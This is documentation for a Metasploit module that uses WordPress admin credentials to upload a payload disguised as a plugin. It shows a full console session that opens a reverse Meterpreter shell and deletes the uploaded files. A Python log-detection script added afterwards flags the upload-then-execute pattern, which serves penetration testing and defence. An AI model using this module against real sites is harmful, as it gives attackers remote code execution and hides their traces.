metasploit-gs/documentation/modules/exploit/unix/webapp/wp_admin_shell_upload.md
2017-04-24 15:50:59 -05:00


Vulnerable Application

This module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is authenticated code execution by design, it should work on all versions of WordPress.

Vulnerable Application Installation

You can get WordPress from https://wordpress.org/download/ or from some Linux package managers. Debian maintains an installation guide that also works on Ubuntu. Note that in a default install of WP from apt, the plugins directory is owned by root, so unless you chown it to the web user, this module will not work. Doing so is common in real-world deployments to allow legitimate administrators to install plugins, so it is not unreasonable for your own installation.

Verification steps

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf exploit(wp_admin_shell_upload) > set PASSWORD password
PASSWORD => password
msf exploit(wp_admin_shell_upload) > set TARGETURI /wp/
TARGETURI => /wp/
msf exploit(wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Authenticating with WordPress using admin:password...
[+] Login successful
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Acquired a plugin upload nonce: afa507398f
[*] Uploaded plugin iHNhrYLmGR
[*] Executing the payload at /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php...
[*] Sending stage (33986 bytes) to 192.168.100.131
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.131:40039) at 2017-04-21 11:36:33 -0500
[+] Deleted DcrpFXPOCG.php
[+] Deleted iHNhrYLmGR.php

meterpreter > pwd
/var/lib/wordpress/wp-content/plugins/iHNhrYLmGR
meterpreter >
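
Detection example (added here; not part of the Metasploit module or its documentation): the session above uploads a plugin and then requests a PHP file inside the new plugin directory, so the sketch below flags that sequence in a web access log. It assumes Apache/nginx "combined" log format, WordPress's /wp-admin/update.php?action=upload-plugin upload request, and a 60-second correlation window; the log lines are constructed from the session output, and the function and constant names are illustrative.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in "combined" format (not real traffic).
SAMPLE_LOG = """\
192.168.100.1 - - [21/Apr/2017:11:36:31 -0500] "POST /wp/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.100.1 - - [21/Apr/2017:11:36:32 -0500] "POST /wp/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
192.168.100.1 - - [21/Apr/2017:11:36:33 -0500] "GET /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.100.9 - - [21/Apr/2017:11:50:10 -0500] "POST /wp/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.100.9 - - [21/Apr/2017:11:50:12 -0500] "GET /wp/wp-admin/plugins.php HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
192.168.100.7 - - [21/Apr/2017:11:55:02 -0500] "GET /wp/wp-content/plugins/akismet/akismet.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" \d{3}'
)
UPLOAD_RE = re.compile(r"/wp-admin/update\.php\?(?:.*&)?action=upload-plugin")
PLUGIN_PHP_RE = re.compile(r"/wp-content/plugins/[^/]+/[^/?]+\.php(?:\?|$)")
WINDOW = timedelta(seconds=60)  # assumed correlation window; tune per site


def find_upload_then_exec(log_text, window=WINDOW):
    """Return (ip, upload_time, plugin_uri) for each direct plugin-PHP request
    made by a client within `window` after that client uploaded a plugin."""
    last_upload = {}  # client ip -> time of its most recent plugin upload
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, uri = m["ip"], m["uri"]
        if m["method"] == "POST" and UPLOAD_RE.search(uri):
            last_upload[ip] = ts
        elif PLUGIN_PHP_RE.search(uri) and ip in last_upload:
            if timedelta(0) <= ts - last_upload[ip] <= window:
                hits.append((ip, last_upload[ip].isoformat(), uri))
    return hits


if __name__ == "__main__":
    for hit in find_upload_then_exec(SAMPLE_LOG):
        print("plugin upload followed by direct PHP request:", hit)
```

The module deletes the uploaded PHP files once the session opens, as the output above shows, so the web server log is worth checking even when the plugin directory no longer contains them.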